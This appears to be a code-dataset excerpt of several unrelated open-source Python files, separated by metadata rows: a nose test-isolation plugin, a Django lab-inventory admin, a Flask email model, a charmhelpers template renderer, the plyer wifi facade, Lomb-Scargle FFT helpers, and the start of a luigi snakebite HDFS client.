setup and teardown to run for each name, defeating the grouping that
is normally used to ensure that context setup and teardown are run the
fewest possible times for a given set of names.
PLEASE NOTE that this plugin should not be used in conjunction with
other plugins that assume that modules once imported will stay
imported; for instance, it may cause very odd results when used with
the coverage plugin.
"""
import logging
import sys
from nose.plugins import Plugin
log = logging.getLogger('nose.plugins.isolation')
class IsolationPlugin(Plugin):
    """
    Activate the isolation plugin to isolate changes to external
    modules to a single test module or package. The isolation plugin
    resets the contents of sys.modules after each test module or
    package runs to its state before the test. PLEASE NOTE that this
    plugin should not be used with the coverage plugin in any other case
    where module reloading may produce undesirable side-effects.
    """
    score = 10 # I want to be last
    name = 'isolation'

    def configure(self, options, conf):
        Plugin.configure(self, options, conf)
        self._mod_stack = []

    def beforeContext(self):
        """Push a snapshot of sys.modules before a test context starts."""
        self._mod_stack.append(sys.modules.copy())

    def afterContext(self):
        """Pop the snapshot taken in beforeContext and restore sys.modules
        to that state, dropping any modules imported in between."""
        snapshot = self._mod_stack.pop()
        added = [name for name in sys.modules.keys() if name not in snapshot]
        if added:
            log.debug('removing sys modules entries: %s', added)
            for name in added:
                del sys.modules[name]
        sys.modules.update(snapshot)

    def loadTestsFromNames(self, names, module=None):
        """Create a lazy suite that calls beforeContext and afterContext
        around each name. The side-effect of this is that full context
        fixtures will be set up and torn down around each test named.
        """
        # Fast path for when we don't care
        if not names or len(names) == 1:
            return
        loader = self.loader
        plugins = self.conf.plugins

        def lazy():
            for name in names:
                plugins.beforeContext()
                yield loader.loadTestsFromName(name, module=module)
                plugins.afterContext()

        return (loader.suiteClass(lazy), [])

    def prepareTestLoader(self, loader):
        """Keep a handle on the test loader for loadTestsFromNames."""
        self.loader = loader
| bsd-3-clause | -7,653,814,076,835,601,000 | 36.489796 | 76 | 0.67828 | false | 4.431846 | true | false | false |
graik/labhamster | labhamster/admin.py | 1 | 12409 | ## Copyright 2016 - 2018 Raik Gruenberg
## This file is part of the LabHamster project (https://github.com/graik/labhamster).
## LabHamster is released under the MIT open source license, which you can find
## along with this project (LICENSE) or at <https://opensource.org/licenses/MIT>.
from __future__ import unicode_literals
from labhamster.models import *
from django.contrib import admin
import django.forms
from django.http import HttpResponse
import django.utils.html as html
import customforms
def export_csv(request, queryset, fields):
    """
    Helper method for Admin make_csv action. Exports selected objects as
    CSV file.

    request  -- current HttpRequest (unused, kept for the action signature)
    queryset -- selected model instances
    fields   -- OrderedDict of column name / dotted attribute path pairs
                (e.g. 'vendor.name'), see Product.make_csv for example

    Returns an HttpResponse with text/csv content served as an attachment.
    """
    import csv
    from operator import attrgetter

    response = HttpResponse(content_type='text/csv')
    response['Content-Disposition'] = 'attachment; filename=orders.csv'

    writer = csv.writer(response)
    writer.writerow(fields.keys())

    for o in queryset:
        columns = []
        for name, value in fields.items():
            try:
                # resolve dotted attribute paths with attrgetter instead of
                # eval(); paths like 'vendor.name' behave identically but no
                # arbitrary code can be executed
                columns.append(attrgetter(value)(o))
            except Exception:
                columns.append("") ## capture 'None' fields
        # NOTE(review): `unicode` assumes Python 2 (file imports
        # unicode_literals); under Python 3 this branch would NameError
        columns = [ c.encode('utf-8') if type(c) is unicode else c \
                    for c in columns]
        writer.writerow( columns )

    return response
class RequestFormAdmin(admin.ModelAdmin):
    """
    ModelAdmin that adds a 'request' field to the form generated by the Admin.
    This e.g. allows to extract the user ID during the creation of the form.
    """

    def get_form(self, request, obj=None, **kwargs):
        """Return the admin form class with the current request attached.

        See http://stackoverflow.com/questions/1057252/how-do-i-access-the-request-object-or-any-other-variable-in-a-forms-clean-met
        (last answer, much simpler than Django 1.6 version)
        """
        form_class = super(RequestFormAdmin, self).get_form(request, obj=obj, **kwargs)
        form_class.request = request
        return form_class
class GrantAdmin(admin.ModelAdmin):
    # minimal admin: alphabetical listing only
    ordering = ('name',)

admin.site.register(Grant, GrantAdmin)

class CategoryAdmin(admin.ModelAdmin):
    # minimal admin: alphabetical listing only
    ordering = ('name',)

admin.site.register(Category, CategoryAdmin)

class VendorAdmin(admin.ModelAdmin):
    # two form sections: account/link info and contact details
    fieldsets = ((None, {'fields': (('name',),
                                    ('link', 'login', 'password'),)}),
                 ('Contact', {'fields' : (('contact',),
                                          ('email','phone'),)})
                 )

    list_display = ('name', 'link', 'login', 'password')
    ordering = ('name',)
    search_fields = ('name', 'contact')

admin.site.register(Vendor, VendorAdmin)
class ProductAdmin(admin.ModelAdmin):
    """Admin for products: custom columns, bulk status actions, CSV export."""

    fieldsets = ((None, {'fields': (('name', 'category'),
                                    ('vendor', 'catalog'),
                                    ('manufacturer', 'manufacturer_catalog'),
                                    'link',
                                    ('status', 'shelflife'),
                                    'comment',
                                    'location')}),)

    list_display = ('name', 'show_vendor', 'category', 'show_catalog',
                    'status')
    list_filter = ('status', 'category', 'vendor')
    ordering = ('name',)
    search_fields = ('name', 'comment', 'catalog', 'location', 'vendor__name',
                     'manufacturer__name', 'manufacturer_catalog')
    save_as = True

    actions = ['make_ok',
               'make_low',
               'make_out',
               'make_deprecated',
               'make_csv']

    ## reduce size of Description text field.
    formfield_overrides = {
        models.TextField: {'widget': django.forms.Textarea(
            attrs={'rows': 4,
                   'cols': 80})},
    }

    def _set_status(self, request, queryset, status):
        """Bulk-update `status` on the selected products and notify the user.

        Shared implementation for the four make_* status actions below,
        which previously duplicated this code.
        """
        n = queryset.update(status=status)
        self.message_user(request, '%i products were updated' % n)

    def make_ok(self, request, queryset):
        self._set_status(request, queryset, 'ok')
    make_ok.short_description = 'Mark selected entries as in stock'

    def make_low(self, request, queryset):
        self._set_status(request, queryset, 'low')
    make_low.short_description = 'Mark selected entries as running low'

    def make_out(self, request, queryset):
        self._set_status(request, queryset, 'out')
    make_out.short_description = 'Mark selected entries as out of stock'

    def make_deprecated(self, request, queryset):
        self._set_status(request, queryset, 'deprecated')
    make_deprecated.short_description = 'Mark selected entries as deprecated'

    def make_csv(self, request, queryset):
        """Export the selected products as a CSV download.

        The OrderedDict maps CSV column headers to (dotted) attribute
        paths resolved by export_csv, preserving column order.
        """
        from collections import OrderedDict
        fields = OrderedDict([('Name', 'name'),
                              ('Vendor', 'vendor.name'),
                              ('Vendor Catalog', 'catalog'),
                              ('Manufacturer', 'manufacturer.name'),
                              ('Manufacturer Catalog', 'manufacturer_catalog'),
                              ('Category', 'category.name'),
                              ('Shelf_life', 'shelflife'),
                              ('Status', 'status'),
                              ('Location', 'location'),
                              ('Link', 'link'),
                              ('Comment', 'comment')])
        return export_csv(request, queryset, fields)
    make_csv.short_description = 'Export products as CSV'

    ## note: this currently breaks the selection of products from the
    ## order form "lense" button
    def show_name(self, o):
        """Link to the product: name truncated to 40 chars, comment tooltip."""
        # Pass the comment unwrapped so format_html escapes it; the previous
        # SafeUnicode(o.comment) wrapper let user-entered markup break out of
        # the title attribute (HTML injection).
        return html.format_html(
            '<a href="{url}" title="{comment}">{name}</a>',
            url=o.get_absolute_url(),
            name=T.truncate(o.name, 40),
            comment=o.comment)
    show_name.short_description = 'Name'
    show_name.admin_order_field = 'name'

    def show_vendor(self, o):
        """Display in table: Vendor, plus (Manufacturer) on a second line."""
        # Build the markup with format_html so both names are escaped; the
        # previous code passed the concatenated string as the *format string*
        # of format_html, which crashed on '{' in names and skipped escaping.
        if o.manufacturer:
            return html.format_html('{}<br>({})',
                                    o.vendor.name, o.manufacturer.name)
        return o.vendor.name
    show_vendor.admin_order_field = 'vendor'
    show_vendor.short_description = 'Vendor'

    def show_catalog(self, o):
        """Catalog number truncated to 15 characters for the changelist."""
        return T.truncate(o.catalog, 15)
    show_catalog.short_description = 'Catalog'
    show_catalog.admin_order_field = 'catalog'
admin.site.register(Product, ProductAdmin)
class OrderAdmin(RequestFormAdmin):
    """Admin for orders: status workflow actions, CSV export, rich columns.

    Inherits RequestFormAdmin so the form can see the current request
    (e.g. to record the requesting user).
    """

    form = customforms.OrderForm
    raw_id_fields = ('product',)
    fieldsets = ((None,
                  {'fields': (('status', 'is_urgent', 'product',),
                              ('created_by', 'ordered_by', 'date_ordered',
                               'date_received'))}),
                 ('Details', {'fields': (('unit_size', 'quantity'),
                                         ('price', 'po_number'),
                                         ('grant', 'grant_category'),
                                         'comment')}))
    radio_fields = {'grant': admin.VERTICAL,
                    'grant_category': admin.VERTICAL}
    list_display = ('show_title', 'Status', 'show_urgent',
                    'show_quantity', 'show_price',
                    'requested', 'show_requestedby', 'ordered',
                    'received', 'show_comment',)
    list_filter = ('status',
                   'product__category__name', 'grant', 'created_by',
                   'product__vendor__name',)
    ordering = ('-date_created', 'product', '-date_ordered')  # , 'price')
    search_fields = ('comment', 'grant__name', 'grant__grant_id',
                     'product__name', 'product__vendor__name')
    save_as = True
    date_hierarchy = 'date_created'
    actions = ['make_ordered', 'make_received', 'make_cancelled', 'make_csv']

    def show_title(self, o):
        """Changelist link: truncated product name plus [vendor].

        The vendor moves to a second line when the combined text would be
        too wide for one line.
        """
        n = T.truncate(o.product.name, 40)
        v = o.product.vendor.name
        r = html.format_html('<a href="{}">{}', o.get_absolute_url(), n)
        r += '<br>' if len(n) + len(v) > 37 else ' '
        r += html.format_html('[{}]</a>', v)
        # Each piece was escaped by format_html above, so the concatenation
        # is safe to mark as such.
        return html.mark_safe(r)
    show_title.short_description = 'Product'

    def show_comment(self, obj):
        """
        @return: truncated comment with the full comment as a mouse-over
        """
        if not obj.comment:
            return ''
        # Build all markup via format_html so the user-entered comment is
        # escaped; the previous '%s' interpolation combined with
        # allow_tags=True rendered raw user input as HTML (injection risk).
        if len(obj.comment) < 30:
            return html.format_html('{}', obj.comment)
        return html.format_html('<a title="{}">{}</a>',
                                obj.comment, T.truncate(obj.comment, 30))
    show_comment.short_description = 'comment'
    show_comment.allow_tags = True

    def show_price(self, o):
        """Workaround for bug in djmoney -- MoneyField confuses Admin
        formatting; render an empty cell when no price is set."""
        if not o.price:
            return ''
        return o.price
    show_price.admin_order_field = 'price'
    show_price.short_description = 'Unit price'

    def show_urgent(self, o):
        """Show an exclamation mark if the order is urgent."""
        if not o.is_urgent:
            return ''
        return html.format_html(
            '<big>&#10071;</big>')
    show_urgent.admin_order_field = 'is_urgent'
    show_urgent.short_description = '!'

    def show_requestedby(self, o):
        """User who created the order (short column header)."""
        return o.created_by
    show_requestedby.admin_order_field = 'created_by'
    show_requestedby.short_description = 'By'

    def show_quantity(self, o):
        """Order quantity (short column header)."""
        return o.quantity
    show_quantity.short_description = 'Q'

    def make_ordered(self, request, queryset):
        """
        Mark several orders as 'ordered', stamping the acting user and time.

        see: https://docs.djangoproject.com/en/1.4/ref/contrib/admin/actions/
        """
        import datetime
        n = queryset.update(status='ordered', ordered_by=request.user,
                            date_ordered=datetime.datetime.now())
        self.message_user(request, '%i orders were updated' % n)
    make_ordered.short_description = 'Mark selected entries as ordered'

    def make_received(self, request, queryset):
        """Mark selected orders received and set their products to 'ok'."""
        import datetime
        n = queryset.update(date_received=datetime.datetime.now(),
                            status='received')
        i = 0
        for order in queryset:
            order.product.status = 'ok'
            order.product.save()
            i += 1
        self.message_user(
            request,
            '%i orders were updated and %i products set to "in stock"'
            % (n, i))
    make_received.short_description = 'Mark as received (and update product status)'

    def make_cancelled(self, request, queryset):
        """Mark selected orders cancelled and clear their date stamps."""
        n = queryset.update(date_received=None, date_ordered=None,
                            status='cancelled')
        self.message_user(request, '%i orders were set to cancelled' % n)
    make_cancelled.short_description = 'Mark selected entries as cancelled'

    def make_csv(self, request, queryset):
        """
        Export selected orders as CSV file.

        The OrderedDict maps CSV column headers to (dotted) attribute paths
        resolved by export_csv, preserving column order.
        """
        from collections import OrderedDict
        fields = OrderedDict([('Product', 'product.name'),
                              ('Quantity', 'quantity'),
                              ('Price', 'price'),
                              ('Vendor', 'product.vendor.name'),
                              ('Catalog', 'product.catalog'),
                              ('PO Number', 'po_number'),
                              ('Requested', 'date_created'),
                              ('Requested by', 'created_by.username'),
                              ('Ordered', 'date_ordered'),
                              ('Ordered by', 'ordered_by.username'),
                              ('Received', 'date_received'),
                              ('Status', 'status'),
                              ('Urgent', 'is_urgent'),
                              ('Comment', 'comment')])
        return export_csv(request, queryset, fields)
    make_csv.short_description = 'Export orders as CSV'
admin.site.register(Order, OrderAdmin)
| mit | 5,380,798,477,713,165,000 | 34.864162 | 128 | 0.539608 | false | 4.361687 | false | false | false |
wa3l/mailr | email_model.py | 1 | 1590 | from flask.ext.sqlalchemy import SQLAlchemy
import html2text as convert
import time
db = SQLAlchemy()
class Email(db.Model):
    """
    Email model

    Store emails going through the app in a database.
    """
    id = db.Column(db.Integer, primary_key=True)
    to_email = db.Column(db.String(254))      # 254 = max address length (RFC 5321)
    to_name = db.Column(db.String(256))
    from_email = db.Column(db.String(254))
    from_name = db.Column(db.String(256))
    subject = db.Column(db.String(78))        # 78 = recommended line limit (RFC 2822)
    html = db.Column(db.UnicodeText)
    text = db.Column(db.UnicodeText)          # plain-text rendering of `html`
    service = db.Column(db.String(10))
    deliverytime = db.Column(db.BigInteger)   # unix timestamp, seconds

    def __init__(self, data):
        """Populate the record from a request payload dict.

        `data` must contain 'to', 'to_name', 'from', 'from_name', 'subject'
        and 'body'; 'service' and 'deliverytime' are optional.
        """
        self.to_email = data['to']
        self.to_name = data['to_name']
        self.from_email = data['from']
        self.from_name = data['from_name']
        self.subject = data['subject']
        self.html = data['body']
        # Keep a plain-text rendering alongside the HTML body.
        self.text = convert.html2text(data['body'])
        # dict.get / `in` replace the Python-2-only dict.has_key() calls,
        # which raise AttributeError on Python 3.
        self.service = data.get('service')
        if 'deliverytime' in data:
            self.deliverytime = int(data['deliverytime'])
        else:
            # Default to "now" when the caller gives no delivery time.
            self.deliverytime = int(time.time())

    def __str__(self):
        """Dict-style dump of the message fields (useful for logging)."""
        return str({
            'to': self.to_email,
            'from': self.from_email,
            'to_name': self.to_name,
            'from_name': self.from_name,
            'subject': self.subject,
            'text': self.text,
            'html': self.html,
            'service': self.service,
            'deliverytime': str(self.deliverytime)
        })

    def __repr__(self):
        return str(self)
| mit | -104,383,001,852,401,000 | 28.444444 | 74 | 0.583648 | false | 3.319415 | false | false | false |
juju/juju-gui-charm | hooks/charmhelpers/core/templating.py | 1 | 3186 | # Copyright 2014-2015 Canonical Limited.
#
# This file is part of charm-helpers.
#
# charm-helpers is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License version 3 as
# published by the Free Software Foundation.
#
# charm-helpers is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with charm-helpers. If not, see <http://www.gnu.org/licenses/>.
import os
from charmhelpers.core import host
from charmhelpers.core import hookenv
def render(source, target, context, owner='root', group='root',
           perms=0o444, templates_dir=None, encoding='UTF-8', template_loader=None):
    """
    Render a template.

    The `source` path, if not absolute, is relative to the `templates_dir`.

    The `target` path should be absolute. It can also be `None`, in which
    case no file will be written.

    The context should be a dict containing the values to be replaced in the
    template.

    The `owner`, `group`, and `perms` options will be passed to `write_file`.

    If omitted, `templates_dir` defaults to the `templates` folder in the charm.

    The rendered template will be written to the file as well as being returned
    as a string.

    Note: Using this requires python-jinja2; if it is not installed, calling
    this will attempt to use charmhelpers.fetch.apt_install to install it.
    """
    try:
        from jinja2 import FileSystemLoader, Environment, exceptions
    except ImportError:
        try:
            from charmhelpers.fetch import apt_install
        except ImportError:
            hookenv.log('Could not import jinja2, and could not import '
                        'charmhelpers.fetch to install it',
                        level=hookenv.ERROR)
            raise
        # Install jinja2 on the fly, then retry the import.
        apt_install('python-jinja2', fatal=True)
        from jinja2 import FileSystemLoader, Environment, exceptions

    if template_loader:
        template_env = Environment(loader=template_loader)
    else:
        if templates_dir is None:
            templates_dir = os.path.join(hookenv.charm_dir(), 'templates')
        template_env = Environment(loader=FileSystemLoader(templates_dir))
    try:
        template = template_env.get_template(source)
    except exceptions.TemplateNotFound as e:
        hookenv.log('Could not load template %s from %s.' %
                    (source, templates_dir),
                    level=hookenv.ERROR)
        raise e
    content = template.render(context)
    if target is not None:
        # Create the containing directory if needed before writing.
        target_dir = os.path.dirname(target)
        if not os.path.exists(target_dir):
            # This is a terrible default directory permission, as the file
            # or its siblings will often contain secrets.
            host.mkdir(target_dir, owner, group, perms=0o755)
        host.write_file(target, content.encode(encoding), owner, group, perms)
    return content
| agpl-3.0 | -3,079,095,182,892,421,000 | 38.333333 | 84 | 0.677652 | false | 4.231076 | false | false | false |
kivy/plyer | plyer/facades/wifi.py | 1 | 4169 | '''
Wifi Facade.
=============
The :class:`Wifi` is to provide access to the wifi of your mobile/ desktop
devices.
It currently supports `connecting`, `disconnecting`, `scanning`, `getting
available wifi network list` and `getting network information`.
Simple examples
---------------
To enable/ turn on wifi scanning::
>>> from plyer import wifi
>>> wifi.start_scanning()
Once the wifi is enabled/ turned on, then this command starts to scan
all the nearby available wifi networks.
To get network info::
>>> from plyer import wifi
>>> wifi.start_scanning()
>>> return wifi.get_network_info(name)
Returns network details of the network whose name/ssid is provided in the
`name` parameter.
To connect to a network::
>>> from plyer import wifi
>>> wifi.start_scanning()
>>> wifi.connect(network, parameters)
This connects to the network whose name/ssid is given by the `network`
argument, using the connection details supplied in `parameters`, which
vary from platform to platform.
Please see the following files for details about the requirements of the
`parameters` argument of the `connect` method:
plyer/platforms/win/wifi.py
plyer/platforms/macosx/wifi.py
plyer/platforms/win/wifi.py
To disconnect from wifi::
>>> from plyer import wifi
>>> wifi.disconnect()
This disconnects your device from any wifi network.
To get available wifi networks::
>>> from plyer import wifi
>>> wifi.start_scanning()
>>> return wifi.get_available_wifi()
This returns all the available wifi networks near the device.
Supported Platforms
-------------------
Windows, OS X, Linux
To enable wifi::

    >>> from plyer import wifi
    >>> wifi.enable()

This enables the wifi device.

To disable wifi::

    >>> from plyer import wifi
    >>> wifi.disable()

This disables the wifi device.
'''
class Wifi:
    '''
    Wifi Facade.

    Platform-independent access to the device wifi: scanning, querying
    networks, connecting/disconnecting and toggling the interface.  Each
    public method delegates to a matching ``_``-prefixed hook, which the
    platform implementations override; the base hooks below all raise
    NotImplementedError.
    '''

    def is_enabled(self):
        '''
        Return enabled status of WiFi hardware.
        '''
        return self._is_enabled()

    def is_connected(self, interface=None):
        '''
        Return connection state of WiFi interface.

        .. versionadded:: 1.4.0
        '''
        return self._is_connected(interface=interface)

    @property
    def interfaces(self):
        '''
        List all available WiFi interfaces.

        .. versionadded:: 1.4.0
        '''
        raise NotImplementedError()

    def start_scanning(self, interface=None):
        '''
        Turn on wifi scanning.
        '''
        return self._start_scanning(interface=interface)

    def get_network_info(self, name):
        '''
        Return a dictionary of details about the network whose name/ssid
        is `name`.
        '''
        return self._get_network_info(name=name)

    def get_available_wifi(self):
        '''
        Return a list of all the available wifi networks.
        '''
        return self._get_available_wifi()

    def connect(self, network, parameters, interface=None):
        '''
        Connect to the network whose name/ssid is `network`, using the
        platform-specific connection details in `parameters`.
        '''
        self._connect(
            network=network,
            parameters=parameters,
            interface=interface
        )

    def disconnect(self, interface=None):
        '''
        Disconnect from the currently connected network.
        '''
        self._disconnect(interface=interface)

    def enable(self):
        '''
        Wifi interface power state is set to "ON".
        '''
        self._enable()

    def disable(self):
        '''
        Wifi interface power state is set to "OFF".
        '''
        self._disable()

    # private hooks: platform implementations override these

    def _is_enabled(self):
        raise NotImplementedError()

    def _is_connected(self, interface=None):
        raise NotImplementedError()

    def _start_scanning(self, interface=None):
        raise NotImplementedError()

    def _get_network_info(self, **kwargs):
        raise NotImplementedError()

    def _get_available_wifi(self):
        raise NotImplementedError()

    def _connect(self, **kwargs):
        raise NotImplementedError()

    def _disconnect(self, interface=None):
        raise NotImplementedError()

    def _enable(self):
        raise NotImplementedError()

    def _disable(self):
        raise NotImplementedError()
| mit | -8,623,485,429,783,333,000 | 21.294118 | 74 | 0.623411 | false | 4.284687 | false | false | false |
jakevdp/lombscargle | lombscargle/implementations/utils.py | 1 | 5934 | from __future__ import print_function, division
import numpy as np
try:
    from scipy import special as scipy_special
except ImportError:
    scipy_special = None


# Factorials of 0..15, precomputed so small arguments avoid a scipy call.
FACTORIALS = [1, 1, 2, 6, 24, 120, 720, 5040, 40320, 362880, 3628800,
              39916800, 479001600, 6227020800, 87178291200, 1307674368000]


def factorial(N):
    """Return N!, from the lookup table when N <= 15, else via scipy.

    Raises ValueError for large N when scipy is not installed.
    """
    if N < len(FACTORIALS):
        return FACTORIALS[N]
    if scipy_special is None:
        raise ValueError("need scipy for computing larger factorials")
    return int(scipy_special.factorial(N))
def bitceil(N):
    """
    Return the power of 2 immediately greater than or equal to N.

    Works for numbers up to 2 ** 64; roughly int(2 ** np.ceil(np.log2(N)))
    but uses only integer bit-twiddling: smear the highest set bit of N - 1
    all the way right, then add one.
    """
    n = int(N) - 1
    shift = 1
    while shift <= 32:
        n |= n >> shift
        shift <<= 1
    return n + 1
def extirpolate(x, y, N=None, M=4):
    """
    Extirpolate the values (x, y) onto an integer grid range(N),
    using lagrange polynomial weights on the M nearest points.

    Parameters
    ----------
    x : array_like
        array of abscissas
    y : array_like
        array of ordinates
    N : int
        number of integer bins to use. For best performance, N should be larger
        than the maximum of x
    M : int
        number of adjoining points on which to extirpolate.

    Returns
    -------
    yN : ndarray
        N extirpolated values associated with range(N)

    Example
    -------
    >>> rng = np.random.RandomState(0)
    >>> x = 100 * rng.rand(20)
    >>> y = np.sin(x)
    >>> y_hat = extirpolate(x, y)
    >>> x_hat = np.arange(len(y_hat))
    >>> f = lambda x: np.sin(x / 10)
    >>> np.allclose(np.sum(y * f(x)), np.sum(y_hat * f(x_hat)))
    True

    Notes
    -----
    This code is based on the C implementation of spread() presented in
    Numerical Recipes in C, Second Edition (Press et al. 1989; p.583).
    """
    # np.ufunc.at (unbuffered in-place accumulation) appeared in numpy 1.8.
    if not hasattr(np.ufunc, 'at'):
        raise NotImplementedError("extirpolate functionality requires numpy "
                                  "version 1.8 or newer")

    x, y = map(np.ravel, np.broadcast_arrays(x, y))

    if N is None:
        # Default grid size: just large enough to hold the extirpolation
        # window around the largest abscissa.
        N = int(np.max(x) + 0.5 * M + 1)

    # Now use legendre polynomial weights to populate the results array;
    # This is an efficient recursive implementation (See Press et al. 1989)
    result = np.zeros(N, dtype=y.dtype)

    # first take care of the easy cases where x is an integer
    # (integer-valued abscissas contribute directly to their own bin)
    integers = (x % 1 == 0)
    np.add.at(result, x[integers].astype(int), y[integers])
    x, y = x[~integers], y[~integers]

    # For each remaining x, find the index describing the extirpolation range.
    # i.e. ilo[i] < x[i] < ilo[i] + M with x[i] in the center,
    # adjusted so that the limits are within the range 0...N
    ilo = np.clip((x - M // 2).astype(int), 0, N - M)
    # numerator: y_i * prod_k (x_i - (ilo_i + k)) over the M window points;
    # the per-bin Lagrange weight divides back out the (x - ind) factor below.
    numerator = y * np.prod(x - ilo - np.arange(M)[:, np.newaxis], 0)
    denominator = factorial(M - 1)

    for j in range(M):
        if j > 0:
            # Recursive update of the Lagrange denominator as the window
            # index advances (Press et al. 1989).
            denominator *= j / (j - M)
        ind = ilo + (M - 1 - j)
        np.add.at(result, ind, numerator / (denominator * (x - ind)))
    return result
def trig_sum(t, h, df, N, f0=0, freq_factor=1,
             oversampling=5, use_fft=True, Mfft=4):
    """Compute (approximate) trigonometric sums for a number of frequencies

    This routine computes weighted sine and cosine sums:

        S_j = sum_i { h_i * sin(2 pi * f_j * t_i) }
        C_j = sum_i { h_i * cos(2 pi * f_j * t_i) }

    Where f_j = freq_factor * (f0 + j * df) for the values j in 1 ... N.

    The sums can be computed either by a brute force O[N^2] method, or
    by an FFT-based O[Nlog(N)] method.

    Parameters
    ----------
    t : array_like
        array of input times
    h : array_like
        array weights for the sum
    df : float
        frequency spacing
    N : int
        number of frequency bins to return
    f0 : float (optional, default=0)
        The low frequency to use
    freq_factor : float (optional, default=1)
        Factor which multiplies the frequency
    use_fft : bool
        if True, use the approximate FFT algorithm to compute the result.
        This uses the FFT with Press & Rybicki's Lagrangian extirpolation.
    oversampling : int (default = 5)
        oversampling freq_factor for the approximation; roughly the number of
        time samples across the highest-frequency sinusoid. This parameter
        contains the tradeoff between accuracy and speed. Not referenced
        if use_fft is False.
    Mfft : int
        The number of adjacent points to use in the FFT approximation.
        Not referenced if use_fft is False.

    Returns
    -------
    S, C : ndarrays
        summation arrays for frequencies f = f0 + df * np.arange(N)
    """
    # Fold freq_factor into the spacing and offset once so the rest of the
    # routine can ignore it.
    df *= freq_factor
    f0 *= freq_factor

    assert df > 0
    t, h = map(np.ravel, np.broadcast_arrays(t, h))

    if use_fft:
        Mfft = int(Mfft)
        assert(Mfft > 0)

        # required size of fft is the power of 2 above the oversampling rate
        Nfft = bitceil(N * oversampling)
        t0 = t.min()

        if f0 > 0:
            # Fold the nonzero starting frequency into the weights as a
            # complex phase so the FFT can start from frequency zero.
            h = h * np.exp(2j * np.pi * f0 * (t - t0))

        # Map each time onto the (periodic) FFT grid, relative to t0.
        tnorm = ((t - t0) * Nfft * df) % Nfft
        grid = extirpolate(tnorm, h, Nfft, Mfft)

        fftgrid = np.fft.ifft(grid)

        if t0 != 0:
            # Undo the t0 time shift with a per-frequency phase correction.
            f = f0 + df * np.arange(Nfft)
            fftgrid *= np.exp(2j * np.pi * t0 * f)

        fftgrid = fftgrid[:N]

        # ifft normalizes by 1/Nfft; multiply back to get the plain sums.
        C = Nfft * fftgrid.real
        S = Nfft * fftgrid.imag
    else:
        # Brute-force O[N * len(t)] evaluation of the sums.
        f = f0 + df * np.arange(N)
        C = np.dot(h, np.cos(2 * np.pi * f * t[:, np.newaxis]))
        S = np.dot(h, np.sin(2 * np.pi * f * t[:, np.newaxis]))

    return S, C
| bsd-3-clause | 7,082,537,745,301,977,000 | 30.903226 | 79 | 0.582406 | false | 3.333708 | false | false | false |
17zuoye/luigi | luigi/contrib/hdfs/snakebite_client.py | 1 | 10933 | # -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
A luigi file system client that wraps around snakebite
Originally written by Alan Brenner <[email protected]> github.com/alanbbr
"""
from luigi.contrib.hdfs import config as hdfs_config
from luigi.contrib.hdfs import error as hdfs_error
from luigi.contrib.hdfs import hadoopcli_clients as hdfs_hadoopcli_clients
from luigi import six
import luigi.contrib.target
import logging
import datetime
import os
logger = logging.getLogger('luigi-interface')
class SnakebiteHdfsClient(hdfs_hadoopcli_clients.HdfsClient):
    """
    A hdfs client using snakebite. Since Snakebite has a python API, it'll be
    about 100 times faster than the hadoop cli client, which does shell out to
    a java program on each file system operation.
    """

    def __init__(self):
        super(SnakebiteHdfsClient, self).__init__()
        self._bite = None  # cached snakebite client, created lazily
        self.pid = -1      # PID that created self._bite (see get_bite)

    @staticmethod
    def list_path(path):
        """Normalize a path argument into the list form snakebite expects."""
        if isinstance(path, (list, tuple)):
            return path
        # six.string_types matches str on Python 3 and str/unicode on
        # Python 2; the previous direct reference to `unicode` raised
        # NameError under Python 3.
        if isinstance(path, six.string_types):
            return [path, ]
        return [str(path), ]

    def get_bite(self):
        """
        If Luigi has forked, we have a different PID, and need to reconnect.
        """
        config = hdfs_config.hdfs()
        if self.pid != os.getpid() or not self._bite:
            client_kwargs = dict(filter(
                lambda k_v: k_v[1] is not None and k_v[1] != '', six.iteritems({
                    'hadoop_version': config.client_version,
                    'effective_user': config.effective_user,
                })
            ))
            if config.snakebite_autoconfig:
                # This is fully backwards compatible with the vanilla Client
                # and can be used for a non HA cluster as well. This client
                # tries to read ``${HADOOP_PATH}/conf/hdfs-site.xml`` to get
                # the address of the namenode. The behaviour is the same as
                # Client.
                from snakebite.client import AutoConfigClient
                self._bite = AutoConfigClient(**client_kwargs)
            else:
                from snakebite.client import Client
                self._bite = Client(config.namenode_host, config.namenode_port,
                                    **client_kwargs)
            # Remember which process created the client; without this the
            # PID check above was always true and a fresh client was created
            # on every call, defeating the cache.
            self.pid = os.getpid()
        return self._bite

    def exists(self, path):
        """
        Use snakebite.test to check file existence.

        :param path: path to test
        :type path: string
        :return: boolean, True if path exists in HDFS
        """
        try:
            return self.get_bite().test(path, exists=True)
        except Exception as err:  # IGNORE:broad-except
            raise hdfs_error.HDFSCliError("snakebite.test", -1, str(err), repr(err))

    def rename(self, path, dest):
        """
        Use snakebite.rename, if available.

        :param path: source file(s)
        :type path: either a string or sequence of strings
        :param dest: destination file (single input) or directory (multiple)
        :type dest: string
        :return: list of renamed items
        """
        parts = dest.rstrip('/').split('/')
        if len(parts) > 1:
            # Make sure the destination's parent directory exists first.
            dir_path = '/'.join(parts[0:-1])
            if not self.exists(dir_path):
                self.mkdir(dir_path, parents=True)
        return list(self.get_bite().rename(self.list_path(path), dest))

    def rename_dont_move(self, path, dest):
        """
        Use snakebite.rename_dont_move, if available.

        :param path: source path (single input)
        :type path: string
        :param dest: destination path
        :type dest: string
        :return: True if succeeded
        :raises: snakebite.errors.FileAlreadyExistsException
        """
        from snakebite.errors import FileAlreadyExistsException
        try:
            self.get_bite().rename2(path, dest, overwriteDest=False)
            return True
        except FileAlreadyExistsException:
            return False

    def remove(self, path, recursive=True, skip_trash=False):
        """
        Use snakebite.delete, if available.

        :param path: delete-able file(s) or directory(ies)
        :type path: either a string or a sequence of strings
        :param recursive: delete directories trees like \*nix: rm -r
        :type recursive: boolean, default is True
